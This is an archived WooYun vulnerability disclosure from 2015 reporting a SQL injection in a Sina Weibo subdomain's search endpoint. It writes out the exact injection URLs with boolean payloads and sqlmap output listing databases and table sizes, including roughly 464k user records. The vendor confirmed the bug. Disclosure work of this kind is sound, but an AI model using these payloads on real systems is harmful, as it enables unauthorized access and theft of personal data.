当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149138

漏洞标题:新浪微博某分站存在SQL注入漏洞 (46W+用户信息泄露)

相关厂商:新浪

漏洞作者: 路人甲

提交时间:2015-10-24 14:36

修复时间:2015-12-09 09:44

公开时间:2015-12-09 09:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-24: 细节已通知厂商并且等待厂商处理中
2015-10-25: 厂商已经确认,细节仅向厂商公开
2015-11-04: 细节向核心白帽子及相关领域专家公开
2015-11-14: 细节向普通白帽子公开
2015-11-24: 细节向实习白帽子公开
2015-12-09: 细节向公众公开

简要描述:

辣么多的用户量,能给个高危吗?

详细说明:

某搜索页面

http://daren.sc.weibo.com/h5/front/search


QQ20151024-2@2x.png


QQ20151024-3@2x.png


搜索的请求,AND 1=1 

http://daren.sc.weibo.com/aj/h5/front/search?type=p&val=1%%27%20AND%201=1%20AND%20%27%%27=%27&page=1&_t=0&__rnd=1445667398522


QQ20151024-0@2x.png


AND 1=2

http://daren.sc.weibo.com/aj/h5/front/search?type=p&val=1%%27%20AND%201=2%20AND%20%27%%27=%27&page=1&_t=0&__rnd=1445667398522


QQ20151024-1@2x.png

漏洞证明:

QQ20151024-4@2x.png


available databases [3]:
[*] darentong
[*] information_schema
[*] test
[12:09:26] [INFO] fetched data logged to text files under '/Users/.sqlmap/output/daren.sc.weibo.com'


Database: darentong
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| daren_goods             | 1610535 |
| `user`                  | 463933  |
| activity_user           | 357809  |
| sku                     | 217527  |
| sku_value               | 138078  |
| daren                   | 61920   |
| goods                   | 55510   |
| sku_attr                | 45776   |
| `order`                 | 18762   |
| apply_settle            | 11800   |
| cash                    | 10233   |
| pay_notify_order        | 6929    |
| income                  | 5332    |
| pay_notify_payment_info | 4567    |
| goods_group             | 4051    |
| pay_trade_info          | 3250    |
| pay_dis_application     | 2375    |
| pay_trade_account       | 2250    |
| merchant                | 1890    |
| crm_top_apply           | 1757    |
| crm_merchant            | 1576    |
| crm_account             | 1529    |
| classification          | 1353    |
| category_goods          | 1223    |
| category_merchant       | 579     |
| adtask                  | 307     |
| crm_user                | 259     |
| refund                  | 191     |
| pay_re_application      | 111     |
| pay_re_plan             | 110     |
| crm_agent_apply         | 81      |
| operator                | 34      |
| express                 | 23      |
| refund_reason           | 18      |
| kv                      | 8       |
| category                | 6       |
| address                 | 4       |
| pay_merchant_pay_info   | 2       |
+-------------------------+---------+

修复方案:

给个高危吧!!!

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-10-25 09:42

厂商回复:

漏洞确认,感谢您的支持

最新状态:

暂无